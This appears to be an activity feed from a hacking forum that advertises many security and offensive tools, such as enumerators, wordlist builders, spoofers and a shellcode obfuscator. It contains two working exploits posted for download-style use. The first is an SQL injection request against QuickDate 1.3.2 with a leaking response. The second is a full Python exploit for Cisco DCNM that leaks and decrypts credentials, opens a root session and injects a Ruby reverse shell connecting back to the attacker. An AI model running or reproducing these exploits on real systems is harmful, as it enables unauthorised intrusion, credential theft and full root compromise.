
Iran Security Group hacking and security forum - Iran Security Group


All activities


  1. Last week
  2. Root SmasheЯ

    Syborg-Recursive DNS Domain Enumerator

    Syborg is a Recursive DNS Domain Enumerator which is neither active nor completely passive. This tool simply constructs a domain name and queries it with a specified DNS server. Syborg has a dead-end avoidance system inspired by @Tomnomnom's ettu. When you run subdomain enumeration with some of the tools, most of them passively query public records like virustotal, crtsh or censys. This enumeration technique is really fast and helps to find a lot of domains in much less time. However, there are some domains that may not be mentioned in these public records. In order to find those domains, Syborg interacts with the nameservers and recursively brute-forces subdomains from the DNS until its queue is empty.

    Installation:
    Resolve the dependencies: pip3 install -r requirements.txt

    Usage:
    python3 syborg.py yahoo.com

    Download Syborg
  3. Root SmasheЯ

    Weblogic Scanner

    Currently detectable vulnerabilities:
    weblogic administrator console
    CVE-2014-4210
    CVE-2016-0638
    CVE-2016-3510
    CVE-2017-3248
    CVE-2017-3506
    CVE-2017-10271
    CVE-2018-2628
    CVE-2018-2893
    CVE-2018-2894
    CVE-2018-3191
    CVE-2018-3245
    CVE-2018-3252
    CVE-2019-2618
    CVE-2019-2725
    CVE-2019-2729
    CVE-2019-2890

    Requirements:
    python >= 3.6
    pip3 install requests

    Download Weblogic scanner
  4. Root SmasheЯ

    Fuzzowski-Network Protocol Fuzzer

    The idea is to be the Network Protocol Fuzzer that we will want to use. The aim of this tool is to assist during the whole process of fuzzing a network protocol, allowing to define the communications, helping to identify the "suspects" of crashing a service, and much more.

    Fuzzowski Network Fuzzer, by Mario Rivas (Fuzzers, inc.)

    Features:
    Based on Sulley Fuzzer for data generation [Hidden Content]
    Actually, forked BooFuzz (which is a fork of Sulley) [Hidden Content]
    Python3
    Not random (finite number of possibilities)
    Requires to "create the packets" with types (spike fuzzer style)
    Also allows to create "Raw" packets from parameters, with injection points (quite useful for fuzzing simple protocols)
    Has a nice console to pause, review and retest any suspect (prompt_toolkit ftw)
    Allows to skip parameters that cause errors, automatically or with the console
    Nice print formats for suspect packets (to know exactly what was fuzzed)
    It saves PoCs as python scripts for you when you mark a test case as a crash
    Monitor modules to gather information of the target, detecting odd behaviours and marking suspects
    Restarter modules that will restart the target if the connection is lost (e.g. powering off and on a smart plug)

    Protocols implemented:
    LPD (Line Printing Daemon): Fully implemented
    IPP (Internet Printing Protocol): Partially implemented
    BACnet (Building Automation and Control networks Protocol): Partially implemented
    Modbus (ICS communication protocol): Partially implemented

    Download Fuzzowski-Network Protocol Fuzzer
  5. Mentalist is a graphical tool for custom wordlist generation. It utilizes common human paradigms for constructing passwords and can output the full wordlist as well as rules compatible with Hashcat and John the Ripper.
    Download Windows version [Hidden Content]
    Download Linux version [Hidden Content] [Hidden Content]
    Download Mac version [Hidden Content]
  6. Recently
  7. On Windows systems, security software restricts access to PowerShell. With this tool, PowerShell can be run using DLLs only. Run PowerShell with dlls only. Does not require access to powershell.exe as it uses powershell automation dlls. PowerShdll can be run with: rundll32.exe, installutil.exe, regsvcs.exe, regasm.exe, regsvr32.exe or as a standalone executable. Download PowerShdll
  8. Root SmasheЯ

    TugaRecon-Fast subdomains enumeration

    tugarecon is a python tool designed to enumerate subdomains using modules. It helps penetration testers and bug hunters collect and gather subdomains for the domain they are targeting. Bruteforce was integrated as a module to increase the possibility of finding more subdomains, using an improved wordlist. TugaRecon is a tribute to the Portuguese explorers, recalling the glorious past of this country. Download TugaRecon
  9. Root SmasheЯ

    PyDictor v2019 - Hacker dictionary builder

    pydictor —— A powerful and useful hacker dictionary builder for a brute-force attack

    Q: Why do I need to use pydictor?
    A:
    1. It can always help you
    You can use pydictor to generate a general blast wordlist, a custom wordlist based on Web content, a social engineering wordlist, and so on; you can use the pydictor built-in tool to safely delete, merge, unique, merge-and-unique, and count word frequency to filter the wordlist; besides, you can also specify your own wordlist and use '-tool handler' to filter it.
    2. Highly customized
    You can generate highly customized and complex wordlists by modifying multiple configuration files, adding your own dictionary, using leet mode, filtering by length, character occurrence count, types of different characters, or regex, and even adding customized encode scripts in the /lib/encode/ folder, your own plugin scripts in the /plugins/ folder, and your own tool scripts in the /tools/ folder.
    3. Powerful and flexible configuration file parsing
    Nothing to say; use it skillfully and you will love it.
    4. Great compatibility
    Whether you are using Python 2.7 or Python 3.x, pydictor can be run on Windows, Linux or Mac.

    Download v2019
  10. Root SmasheЯ

    Full Mobile Hacking CheatSheet - Android/iOS

    iOS
  11. Root SmasheЯ

    Full Mobile Hacking CheatSheet - Android/iOS

    The Mobile Hacking CheatSheet is an attempt to summarise a few interesting basic pieces of information regarding the tools and commands needed to assess the security of Android and iOS mobile applications. Android
  12. Detective

    QuickDate 1.3.2 - SQL Injection

    # Exploit Title: QuickDate 1.3.2 - SQL Injection
    # Dork: N/A
    # Date: 2020-02-07
    # Exploit Author: Ihsan Sencan
    # Vendor Homepage: [Hidden Content]
    # Version: 1.3.2
    # Tested on: Linux
    # CVE: N/A

    # POC:
    # 1)
    #
    POST /find_matches HTTP/1.1
    Host: localhost
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:55.0) Gecko/20100101 Firefox/55.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 425
    Cookie: quickdating=a50b670982b01b4f0608a60217309d11; mode=night; JWT=a0823ac00ff28243d0c8caa841ebacd55bbf6d40f571d45bfb0f504e8b0b13be16222ee080568613ca7be8306ecc3f5fa30ff2c41e64fa7b
    DNT: 1
    Connection: close
    Upgrade-Insecure-Requests: 1

    _located=-7 UNION ALL SELECT%2BCONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113-- -
    #
    #
    HTTP/1.1 200 OK
    Date: Thu, 06 Feb 2020 15:05:34 GMT
    Server: Apache
    Connection: Keep-alive, close
    Access-Control-Allow-Origin: *
    Access-Control-Max-Age: 3600
    Access-Control-Allow-Headers: Content-Type, Access-Control-Allow-Headers, Authorization, X-Requested-With
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, max-age=0, post-check=0, pre-check=0
    Pragma: no-cache
    Vary: User-Agent
    Content-Type: application/json; charset=UTF-8
    Content-Length: 3844

    {"status":200,"page":1,"post":"{\"_located\":\"-7 UNION AL...... class=\"btn waves-effect dislike [email protected] : date_main : 10.2.31-MariaDB\".......","where":"","message":"OK","can_send":1}
    #
  13.
    #!/usr/bin/python
    """
    Cisco Data Center Network Manager LanFabricImpl createLanFabric Command Injection Remote Code Execution Vulnerability

    Tested on:
    Cisco DCNM 11.2.1 ISO Virtual Appliance for VMWare, KVM and Bare-metal servers
    - Release: 11.2(1)
    - Release Date: 05-Jun-2019
    - FileName: dcnm-va.11.2.1.iso.zip
    - Size: 4473.54 MB (4690850167 bytes)
    - MD5 Checksum: b1bba467035a8b41c63802ce8666b7bb

    Bug 1: CVE-2019-15977 / ZDI-20-012
    Bug 2: CVE-2019-15977 / ZDI-20-013
    Bug 3: CVE-2019-15978 / ZDI-20-102

    Example:
    ========

    saturn:~ mr_me$ ./poc.py
    (+) usage: ./poc.py <target> <connectback:port>
    (+) eg: ./poc.py 192.168.100.123 192.168.100.59
    (+) eg: ./poc.py 192.168.100.123 192.168.100.59:1337

    saturn:~ mr_me$ ./poc.py 192.168.100.123 192.168.100.59:1337
    (+) leaked user: root
    (+) leaked pass: Dcnmpass123
    (+) leaked vfs path: temp18206a94b7c45072/content-85ba056e1faec012
    (+) created a root session!
    (+) starting handler on port 1337
    (+) connection from 192.168.100.123
    (+) pop thy shell!
    id
    uid=0(root) gid=0(root) groups=0(root)
    uname -a
    Linux localhost 3.10.0-957.10.1.el7.x86_64 #1 SMP Mon Mar 18 15:06:45 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
    """

    import re
    import sys
    import random
    import socket
    import string
    import requests
    import telnetlib
    from threading import Thread
    from Crypto.Cipher import Blowfish
    from requests.auth import HTTPBasicAuth
    from requests.packages.urllib3.exceptions import InsecureRequestWarning
    requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

    def handler(lp):
        print "(+) starting handler on port %d" % lp
        t = telnetlib.Telnet()
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.bind(("0.0.0.0", lp))
        s.listen(1)
        conn, addr = s.accept()
        print "(+) connection from %s" % addr[0]
        t.sock = conn
        print "(+) pop thy shell!"
        t.interact()

    def exec_code(t, lp, s):
        handlerthr = Thread(target=handler, args=(lp,))
        handlerthr.start()
        c = { "JSESSIONID" : sessionid }
        r = requests.get("[Hidden Content]" % (t, s), cookies=c, verify=False)

    def random_string(string_length = 8):
        """ generate a random string of fixed length """
        letters = string.ascii_lowercase
        return ''.join(random.choice(letters) for i in range(string_length))

    def decrypt(key):
        """ decrypt the leaked password """
        cipher = Blowfish.new("jaas is the way", Blowfish.MODE_ECB)
        msg = cipher.decrypt(key.decode("hex"))
        return msg

    def we_can_leak(target):
        """ used to bypass auth """
        global dbuser, dbpass, vfspth, jdbc, rootuser, rootpass
        dbuser = None
        dbpass = None
        vfspth = None
        rootuser = None
        rootpass = None
        jdbc = None
        uri = '[Hidden Content]' % target
        c = HTTPBasicAuth('admin', 'nbv_12345')
        r = requests.get(uri, verify=False, auth=c)
        leaked = r.text
        match = re.search("db.password = #(.*)", leaked)
        if match:
            dbpass = match.group(1)
        match = re.search("db.user = (.*)", leaked)
        if match:
            dbuser = match.group(1)
        match = re.search("dcnmweb = (.*)", leaked)
        if match:
            vfspth = match.group(1)
        match = re.search("db.url = (.*)", leaked)
        if match:
            jdbc = match.group(1)
        match = re.search("server.sftp.password = #(.*)", leaked)
        if match:
            rootpass = match.group(1)
        match = re.search("server.sftp.username = (.*)", leaked)
        if match:
            rootuser = match.group(1)
        if dbuser and dbpass and vfspth and jdbc and rootuser and rootpass:
            return True
        return False

    def we_can_login(target, password):
        """ we have bypassed auth at this point by leaking the creds """
        global sessionid, resttoken
        d = {
            "j_username" : rootuser,
            "j_password" : password,
        }
        uri = "[Hidden Content]" % target
        r = requests.post(uri, data=d, verify=False, allow_redirects=False)
        if "Set-Cookie" in r.headers:
            match = re.search(r"JSESSIONID=(.{56}).*resttoken=(\d{1,3}:.{44});", r.headers["Set-Cookie"])
            if match:
                sessionid = match.group(1)
                resttoken = match.group(2)
                return True
        return False

    def pop_a_root_shell(t, ls, lp):
        """ get dat shell! """
        handlerthr = Thread(target=handler, args=(lp,))
        handlerthr.start()
        uri = "[Hidden Content]" % t
        cmdi = "%s\";'`{ruby,-rsocket,-e'c=TCPSocket.new(\"%s\",\"%d\");" % (random_string(), ls, lp)
        cmdi += "while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print(io.read)}end'}`'\""
        j = {
            "name" : cmdi,
            # this is needed to pass validate() on line 149 of the LanFabricImpl class
            "generalSetting" : {
                "asn" : "1337",
                "provisionOption" : "Manual"
            },
            "provisionSetting" : {
                "dhcpSetting": {
                    "primarySubnet" : "127.0.0.1",
                    "primaryDNS" : "127.0.0.1",
                    "secondaryDNS" : "127.0.0.1"
                },
                "ldapSetting" : {
                    "server" : "127.0.0.1"
                },
                "amqpSetting" : {
                    "server" : "127.0.0.1:1337"
                }
            }
        }
        c = { "resttoken": resttoken }
        r = requests.post(uri, json=j, cookies=c, verify=False)
        if r.status_code == 200 and ls in r.text:
            return True
        return False

    def main():
        if len(sys.argv) != 3:
            print "(+) usage: %s <target> <connectback:port>" % sys.argv[0]
            print "(+) eg: %s 192.168.100.123 192.168.100.59" % sys.argv[0]
            print "(+) eg: %s 192.168.100.123 192.168.100.59:1337" % sys.argv[0]
            sys.exit(1)
        t = sys.argv[1]
        cb = sys.argv[2]
        if not ":" in cb:
            print "(+) using default connectback port 4444"
            ls = cb
            lp = 4444
        else:
            if not cb.split(":")[1].isdigit():
                print "(-) %s is not a port number!" % cb.split(":")[1]
                sys.exit(-1)
            ls = cb.split(":")[0]
            lp = int(cb.split(":")[1])
        # stage 1 - leak the creds
        if we_can_leak(t):
            pwd = re.sub(r'[^\x20-\x7F]+','', decrypt(rootpass))
            print "(+) leaked user: %s" % rootuser
            print "(+) leaked pass: %s" % pwd
            print "(+) leaked vfs path: %s" % "/".join(vfspth.split("/")[10:])
            # stage 2 - get a valid sesson
            if we_can_login(t, pwd):
                print "(+) created a root session!"
                # stage 3 - get a root shell via cmdi
                pop_a_root_shell(t, ls, lp)

    if __name__ == "__main__":
        main()
  14. Automatically brute force all services running on a target:
    Open ports
    Usernames
    Passwords
    Demo Video:
    Download BruteX v2.1
  15. The code for iHateregex.io - a regex cheatsheet for the haters.
    Features:
    Visual representation of regular expressions
    Matched strings - the testing area
    Embed regular expression visualization on your sites
    Regex code highlighting and validation
    Regex description with markdown support
    Demo: [Hidden Content] [Hidden Content]
  16. A tool for automating cracking methodologies through Hashcat. Download Hate Crack
  17. The Social-Engineer Toolkit (SET) was created and written by Dave Kennedy, the founder of TrustedSec. It is an open-source Python-driven tool aimed at penetration testing around Social-Engineering. It has been presented at large-scale conferences including Blackhat, DerbyCon, Defcon, and ShmooCon. With over two million downloads, it is the standard for social-engineering penetration tests and supported heavily within the security community. Download v8.0.2
  18. Root SmasheЯ

    Damn Small SQLi Scanner

    Damn Small SQLi Scanner (DSSS) is a fully functional SQL injection vulnerability scanner (supporting GET and POST parameters) written in under 100 lines of code. As optional settings, it supports an HTTP proxy together with the HTTP header values User-Agent, Referer and Cookie. DSSS-Nov 12, 2019.zip
  19. Root SmasheЯ

    Snowflake v1.0.3

    Snowflake is a graphical SSH client. It has a file browser, terminal emulator, resource/process manager, disk space analyzer, text editor, log viewer and lots of other helpful tools, which makes it easy to work with remote servers. It runs on Linux and Windows. Snowflake has been tested with Ubuntu server, CentOS, RHEL, OpenSUSE, FreeBSD, OpenBSD, NetBSD and HP-UX.

    Intended audience
    The application is targeted mainly towards web/backend developers who often deploy/debug their code on remote servers and are not overly fond of complex terminal-based commands. It could also be useful for sysadmins who manage lots of remote servers manually.

    Download for Windows | Ubuntu/Mint/Debian | Other Linux | Other (Java11)
  20. Root SmasheЯ

    Chain Reactor

    Chain Reactor is an open source framework for composing executables that can simulate adversary behaviors and techniques on Linux endpoints. Executables can perform sequences of actions like process creation, network connections and more, through the simple configuration of a JSON file. Download
  21. Root SmasheЯ

    PythonAESObfuscate

    Obfuscates a Python script and the accompanying shellcode. Pythonic way to load shellcode. Builds an EXE for you too!

    Usage
    Place a payload.bin raw shellcode file in the same directory. Default architecture is x86. Run python obfuscate.py. Default output is out.py.

    Requirements
    Windows
    Python 2.7
    Pyinstaller
    PyCrypto (PyCryptodome didn't seem to work)

    PythonAESObfuscate-vDec-30, 2019.zip
  22. Root SmasheЯ

    nullinux v4.1

    Nullinux is an internal penetration testing tool for Linux that can be used to enumerate OS information, domain information, shares, directories, and users through SMB. If no username and password are provided in the command line arguments, an anonymous login, or null session, is attempted. Nullinux acts as a wrapper around the Samba tools smbclient & rpcclient to enumerate hosts using a variety of techniques.

    Key Features:
    Single or multi-host enumeration
    Enumerate shares and list files in root directory
    Enumerate users & groups
    Multi-threaded RID Cycling
    Creates a formatted nullinux_users.txt output file free of duplicates for further exploitation
    Python 2.7 & 3 compatible

    Download nullinux v4.1
  23. Root SmasheЯ

    Complete list of all ports

    Complete list of ports together with the name of the service running on each, in line with the latest accepted RFC changes. Download CSV | Download TXT | View as XML | View as HTML
  24. Root SmasheЯ

    Mimir - Smart OSINT collection of common IOC types

    Overview
    This application is designed to assist security analysts and researchers with the collection and assessment of common IOC types. Accepted IOCs currently include IP addresses, domain names, URLs, and file hashes. The title of this project is named after Mimir, a figure in Norse mythology renowned for his knowledge and wisdom. This application aims to provide you knowledge into IOCs and then some added "wisdom" by calculating risk scores per IOC, assigning a common malware family name to hash lookups based off of reports from VirusTotal and OPSWAT, and leveraging machine learning tools to determine if an IP, URL, or domain is likely to be malicious.

    Base Collection
    For network based IOCs, Mimir gathers basic information including: Whois, ASN, Geolocation, Reverse DNS, Passive DNS.

    Collection Sources
    Some of these sources will require an API key, and occasionally only by getting a paid account. I've tried to limit reliance on paid services as much as possible.
    PassiveTotal
    VirusTotal
    DomainTools
    OPSWAT
    Google SafeBrowsing
    Shodan
    PulseDive
    CSIRTG
    URLscan
    HpHosts
    Blacklist checks
    Spam blacklist checks

    Risk Scoring
    The risk scoring works best when Mimir can gather a decent amount of data points for an IOC: pDNS, well populated url/domain results (communicating samples, associated samples, recent scan data, etc.). It also takes into account the ML maliciousness prediction result.

    Machine Learning Predictions
    The machine learning prediction results come from the CSIRT Gadgets projects csirtg-domainsml-py, csirtg-ipsml-py, csirtg-urlsml-py.

    Output
    Mimir offers results output in various options including local file reports or exporting the results to an external service.
    stdout (console output): normalizes result data, printed with headers and subheaders per module
    JSON file: beautified output to local file
    Excel: uses multiple sheets per IOC type
    MISP: commit new indicators
    ThreatConnect: commit new indicators with confidence and threat ratings (optionally assign tags, a description, and a TLP setting)

    Download Mimir
  25. Root SmasheЯ

    InveighZero

    InveighZero is a C# LLMNR/NBNS/mDNS/DNS spoofer and man-in-the-middle tool designed to assist penetration testers/red teamers that find themselves limited to a Windows system. This version shares many features with the PowerShell version of Inveigh.

    Privileged Mode Features (elevated admin required)
    SMB capture - packet sniffer based
    LLMNR spoofer - packet sniffer based
    NBNS spoofer - packet sniffer based
    mDNS spoofer - packet sniffer based
    DNS spoofer - packet sniffer based
    Pcap output - TCP and UDP packets
    Packet sniffer console output - SYN packets, SMB kerberos negotiation, etc

    Unprivileged Mode Features
    LLMNR spoofer - UDP listener based
    NBNS spoofer - UDP listener based
    mDNS spoofer - UDP listener based
    DNS spoofer - UDP listener based

    Note: The NBNS spoofer should work on all systems even with NBNS enabled. The LLMNR and mDNS spoofers seem to work on Windows 10 and Server 2016 with those services already enabled. Firewalls can still get in the way of everything.

    Other Features
    HTTP capture - TCP listener based
    Proxy auth capture - TCP listener based

    Notable Missing Features
    ADIDNS attacks
    HTTP to SMB Relay
    HTTPS listener
    Kerberos kirbi output

    Notable Differences
    Capture and log data can be imported from previous output files. The PowerShell version stores data in a global variable that persists within the PowerShell instance.
    InveighZero does not execute in the background. Instead, a console is accessible while InveighZero is running. The console has commands that have similar functionality to Inveigh's Get-Inveigh, Watch-Inveigh, and Stop-Inveigh support functions.

    Minimum .NET Version: 3.5

    Download InveighZero
  26. Root SmasheЯ

    Inveigh v1.5

    Inveigh is a PowerShell ADIDNS/LLMNR/NBNS/mDNS/DNS spoofer and man-in-the-middle tool designed to assist penetration testers/red teamers that find themselves limited to a Windows system. At its core, Inveigh is a .NET packet sniffer that listens for and responds to LLMNR/mDNS/NBNS/DNS requests while also capturing incoming NTLMv1/NTLMv2 authentication attempts over the Windows SMB service. The primary advantage of this packet sniffing method on Windows is that port conflicts with default running services are avoided. Inveigh also contains HTTP/HTTPS/Proxy listeners for capturing incoming authentication requests and performing attacks. Inveigh relies on creating multiple runspaces to load the sniffer, listeners, and control functions within a single shell and PowerShell process. Download v1.5
  27. Root SmasheЯ

    Bopscrk

    A tool to generate smart and powerful wordlists.

    Bopscrk (Before Outset PaSsword CRacKing) is a tool to assist in all the steps that precede password cracking. By now, it's able to generate smart and powerful wordlists. The first idea was inspired by Cupp and Crunch. We could say that bopscrk is a wordlist generator situated between them, taking the best of each one. The challenge was to try to apply Cupp's idea to more generic situations and amplify the range of the resultant wordlist, without losing this custom-wordlist-profiler feature.

    bopscrk.zip